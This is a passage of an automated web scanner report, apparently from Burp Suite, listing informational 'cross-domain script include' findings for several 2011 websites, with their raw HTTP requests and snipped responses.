<script src="https://scripts-olui.akamai-cdn.com/CLUIResources/scripts/UIControls.CLUICommon.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/Comp_Art_2009.3.1701.35.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/ClientScript/ValidateUser-3.4.6202.js" type="text/javascript"></script>
<script src="https://scripts-olui.akamai-cdn.com/sve/js/GL/Platform_min.js" type="text/javascript"></script>
...[SNIP]...

21.21. http://response.firstdata.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://response.firstdata.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?elqPURLPage=15 HTTP/1.1
Host: response.firstdata.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:44:07 GMT
Content-Length: 25889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>The F
...[SNIP]...
</nometa>
<SCRIPT src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/jquery.validate.min.js></SCRIPT>
...[SNIP]...
</SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/plugins.js></SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/jquery.uniform.min.js></SCRIPT>
...[SNIP]...
</SCRIPT>
<SCRIPT src=http://img.en25.com/Web/FirstDataCorporation/transarmor_4809.js></SCRIPT>
...[SNIP]...

21.22. https://securitymetrics.com/pricelist.adp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /pricelist.adp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pricelist.adp HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sitecertinfo.adp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:08:14 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 11445

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Keywords" http-
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.23. https://securitymetrics.com/sitecertinfo.adp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sitecertinfo.adp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sitecertinfo.adp HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/PANscan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
MIME-Version: 1.0
Date: Tue, 26 Apr 2011 01:08:09 GMT
Server: AOLserver/4.5.1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9989

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Keywords" http-
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.24. https://securitymetrics.com/sm/PANscan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/PANscan/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sm/PANscan/ HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=09f0146dbd92e08e1aac412eff15ddf24e6644aa; Path=/
Date: Tue, 26 Apr 2011 00:53:04 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 13228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SecurityMe
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.25. https://securitymetrics.com/sm/determinesaq/terminaltype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitymetrics.com
Path:   /sm/determinesaq/terminaltype

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sm/determinesaq/terminaltype HTTP/1.1
Host: securitymetrics.com
Connection: keep-alive
Referer: https://securitymetrics.com/sm/determinesaq/storechd
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4

Response

HTTP/1.1 200 OK
Set-Cookie: smsid=868043594333d3db4590b2723770d82890feecf4; Path=/
Date: Tue, 26 Apr 2011 01:08:49 GMT
Server: SecurityMetrics/3.37.1j
Content-Length: 12217


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Deter
...[SNIP]...
</script>
   <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
   </script>
...[SNIP]...

21.26. https://store.tenable.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?main_page=index&cPath=5 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1; zenid=5717419e1ab4b29ffbd339c41541e7c7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:49:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 22426

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>Perimeter Service : Tenable Store, Unified Security Monitoring</title>
<meta http-equiv="Content-Type" content="text/html; chars
...[SNIP]...
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<div id="digicertsitesealcode" style="width: 81px; height: 76px; margin: 5px auto 0px auto;" align="center"><script language="javascript" type="text/javascript" src="https://www.digicert.com/custsupport/sealtable.php?order_id=00185925&amp;seal_type=a&amp;seal_size=large&amp;seal_color=blue&amp;new=1"></script>
...[SNIP]...

21.27. https://store.tenable.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.tenable.com
Path:   /index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1
Host: store.tenable.com
Connection: keep-alive
Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:39 GMT
Server: Apache
Set-Cookie: zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 28503

<!doctype html>
<html lang="en" dir="ltr" lang="en">
<head>
<title>1 Year Nessus Perimeter Service Subscription [OLS-PTR-EN] - $3,600.00 : Tenable Store, Unified Security Monitoring</title>
<meta
...[SNIP]...
<link rel="shortcut icon" href="includes/templates/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<div id="digicertsitesealcode" style="width: 81px; height: 76px; margin: 5px auto 0px auto;" align="center"><script language="javascript" type="text/javascript" src="https://www.digicert.com/custsupport/sealtable.php?order_id=00185925&amp;seal_type=a&amp;seal_size=large&amp;seal_color=blue&amp;new=1"></script>
...[SNIP]...

21.28. https://support.tenable.com/support-center/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.tenable.com
Path:   /support-center/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support-center/ HTTP/1.1
Host: support.tenable.com
Connection: keep-alive
Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:49:35 GMT
Server: Apache
Set-Cookie: CerberusPublicGUI=9f3i1skvvnpph1et7uucrkbep2; path=/; domain=support.tenable.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19773

<!doctype html>
<html lang="en">
<head>
   <title>Tenable Customer Support Portal</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="stylesheet" href="cerbe
...[SNIP]...
<link rel="shortcut icon" href="cerberus-support-center/themes/tenable/img/favicon.ico" type="image/x-icon">

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...

21.29. http://www.abaca.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abaca.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.abaca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:54:32 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
Last-Modified: Fri, 18 Jun 2010 19:47:09 GMT
ETag: "18cb5-43a8-38700940"
Accept-Ranges: bytes
Content-Length: 17320
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.30. http://www.abaca.com/search.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abaca.com
Path:   /search.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search.js HTTP/1.1
Host: www.abaca.com
Proxy-Connection: keep-alive
Referer: http://www.abaca.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 26 Apr 2011 13:54:34 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
Last-Modified: Wed, 03 Sep 2008 23:51:14 GMT
ETag: "2034c-20ef-82f92080;520d2680"
Accept-Ranges: bytes
Content-Length: 8431
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Abaca Email Protection Gat
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.31. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38736
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:42:59 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=; path=/
Set-Cookie: ASPSESSIONIDSSTDDTRS=GEADHBADIKBEHFGIANJELJKN; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:43:58 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</title>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...
<!-- begin Genbook badge -->
<script src="http://www.genbook.com/bookings/booknowjstag.action?id=30134654&bookingSourceId=1000"></script>
...[SNIP]...

21.32. http://www.afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?page=login&cmd=register HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.1.10.1303778640; site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29083
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:43:37 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:44:37 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
</title>


<script type="text/javascript" src="http://yui.yahooapis.com/combo?3.3.0/build/yui/yui-min.js&3.3.0/build/oop/oop-min.js&3.3.0/build/event-custom/event-custom-min.js&3.3.0/build/dom/dom-base-min.js&3.3.0/build/dom/selector-native-min.js&3.3.0/build/dom/selector-css2-min.js&3.3.0/build/event/event-min.js&3.3.0/build/node/node-base-min.js&3.3.0/build/event/event-base-ie-min.js"></script>
...[SNIP]...
</div>
                   <script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LebsrsSAAAAAMJbRl3Qz8diFZ6mcrvUL6SW1VVf"></script>
...[SNIP]...

21.33. http://www.backbonesecurity.com/interior.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.backbonesecurity.com
Path:   /interior.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /interior.cfm?itemCategory=39808&siteid=418&priorId=0 HTTP/1.1
Host: www.backbonesecurity.com
Proxy-Connection: keep-alive
Referer: http://www.onestoppciscan.com/contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 23:43:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=40337214;path=/
Set-Cookie: CFTOKEN=65706353;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type="text/javascript" src="http://beta.asoundstrategy.com/components/embeddedcontent.js" defer="defer"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://remoting.asoundstrategy.com/components/menu_files/menu.js"></script>
<script type="text/javascript" src="http://remoting.asoundstrategy.com/components/swfobject_source.js"></script>
<script type="text/javascript" src="http://remoting.asoundstrategy.com/assiwebsites/site284/images/template251/motionpack.js"></script>
...[SNIP]...
<link type="text/css" href="style.css" rel="stylesheet"/>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

21.34. http://www.cleanallspyware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cleanallspyware.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.cleanallspyware.com
Proxy-Connection: keep-alive
Referer: http://cleanallspyware.com/Spam
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 15712

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head>
<title>How to Remove Spyware</title>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta name="
...[SNIP]...
</div>

<script src="http://www.directbrand.com/tracking202/static/landing.php?lpip=92317" type="text/javascript"></script>
...[SNIP]...

21.35. http://www.clone-systems.com/ecommerce/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:56:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...

21.36. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/PCI-ASV-Scanning-Services/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/categories/PCI-ASV-Scanning-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:48 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=at9kctjodfv3r3iam6cs56aqf7; expires=Tue, 26-Apr-2011 23:55:48 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...

21.37. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Penetration-Testing/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:49 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=t5s0kmeibbbtts6cq9hfdffs02; expires=Tue, 26-Apr-2011 23:55:49 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
